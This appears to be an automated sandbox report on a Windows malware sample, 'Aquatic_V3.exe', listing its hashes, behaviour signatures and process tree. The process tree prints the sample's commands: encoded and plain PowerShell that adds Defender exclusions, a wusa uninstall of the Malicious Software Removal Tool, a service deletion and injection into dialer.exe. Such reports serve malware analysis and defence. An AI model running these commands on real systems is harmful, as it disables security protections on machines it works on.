Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
31s -
max time network
31s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
15/03/2024, 06:25
Static task
static1
Behavioral task
behavioral1
Sample
Aquatic_V3.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
Aquatic_V3.exe
Resource
win11-20240221-en
General
-
Target
Aquatic_V3.exe
-
Size
2.8MB
-
MD5
99e3bd9d720cd5225a0a5bc68083bd8d
-
SHA1
7fdc97c76dcee5cbefd2a49425f1c161241047b8
-
SHA256
93a68ff2fad73f03cd57898d381641488800e6f3972a5fcff06426a498383b79
-
SHA512
6070c5445fb24c0a43faace255df0df6928d39af5e48d36bd6104a65147545902e051f70c859fb3e1b940c88745d856351811ae4b63b4fa65d95a12e8b9c5ac7
-
SSDEEP
49152:OVW97XtBjD7X5xbGNrWIxKiaDT6pxdObf+uRTlN4afnm16m+gmoZist:OV8tB7X5tGN6YKiw6pUf+uRTTOIduZiS
Malware Config
Signatures
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation Aquatic_V3.exe -
Executes dropped EXE 1 IoCs
pid Process 1872 Winhlp64.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Winhlp64.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1872 set thread context of 4028 1872 Winhlp64.exe 112 -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4084 powershell.exe 3716 powershell.exe 3716 powershell.exe 4084 powershell.exe 1872 Winhlp64.exe 3876 powershell.exe 3876 powershell.exe 3876 powershell.exe 1872 Winhlp64.exe 1872 Winhlp64.exe 1872 Winhlp64.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4084 powershell.exe Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 1872 Winhlp64.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 876 wrote to memory of 3716 876 Aquatic_V3.exe 89 PID 876 wrote to memory of 3716 876 Aquatic_V3.exe 89 PID 876 wrote to memory of 3716 876 Aquatic_V3.exe 89 PID 876 wrote to memory of 4084 876 Aquatic_V3.exe 91 PID 876 wrote to memory of 4084 876 Aquatic_V3.exe 91 PID 876 wrote to memory of 4084 876 Aquatic_V3.exe 91 PID 876 wrote to memory of 1872 876 Aquatic_V3.exe 93 PID 876 wrote to memory of 1872 876 Aquatic_V3.exe 93 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112 PID 1436 wrote to memory of 4720 1436 cmd.exe 114 PID 1436 wrote to memory of 4720 1436 cmd.exe 114 PID 1872 wrote to memory of 4028 1872 Winhlp64.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagB2ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAZAB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAgAHIAZQBxAHUAaQByAGUAcwAgAG8AbgBlACAAbwBmACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAHYAZQByAHMAaQBvAG4AcwAgAG8AZgAgAHQAaABlACAALgBOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrADoAIAB2ADEALgAxAC4ANAAzADIAMgAnACwAJwAnACwAJwBPAEsAJwAsACcAVwBhAHIAbgBpAG4AZwAnACkAPAAjAHoAcAB2ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAaABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABlACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe"C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4720
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:4028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Winhlp64"3⤵
- Launches sc.exe
PID:3428
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD5fc07916328b0f6e55ca6db29481764f4
SHA1e1292a72bfca66489ff22d3a75ca26945f57789b
SHA2567cdae2f7c076a6bac06bc64fabd29128f58b14fd395f052aa1bd237406134050
SHA5128a0dac1bec59970e8a6f5df46d538a9257262f36bb1632004322488e7d6e87a2468c5e1e495e684124504ba79b28017dce4a63011f8067d25ce71c6d69046d8e
-
Filesize
2.8MB
MD55193cb4946d8a5c0e4bcfa2589d2889f
SHA101da27ce3c3aaa705b9e8bc7bf29f4785dbb70a1
SHA256d3c5034163ab5e7b5e6ff2bdb82a5e8c6f3e9adf0474a4e63311944fe1c53811
SHA512d352234b6bf35aa942408eeb4e25dd6acf9081fd70b20cc48250dc8fd29e39a8baebc1c1d118e719ef66841e61144497e93b3f438b799e97eda098a7b866abaf
-
Filesize
2.2MB
MD570ecb641f568a5b5e2f0d00b67d46aa4
SHA18bc29c3fe54c34f4729dff2a1405561ec44926f7
SHA25652e02ff1c6d7dfadd0c4391bedfc76653ef9147e29d29850e8dc4fb3c13e0637
SHA5124645b1e0cd75fd97e65b68f0eb253c8981d31b7a87fe517c069c56707201cb3c537143b078f329f2a2c68cb3cfe922b271e6d0fa2e57b37c9129038b4c700219
-
Filesize
2.4MB
MD5b71d26a28c8201447becb37323b23a1d
SHA1c9bb47615af37da4d8374d91d1b44c6efe1c3947
SHA256778cf5f0e0aa621a3b04d2ccaaa15a08656a97c643f9afa1111408116d5998fa
SHA5129f77745b074613aa283015c664870101dda0f2b259bc9b384f18b86572b36c002fd77c96b00915e925d9523311bdd52e430daf40d46c9b7ea2b7541b4bc4a1f3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82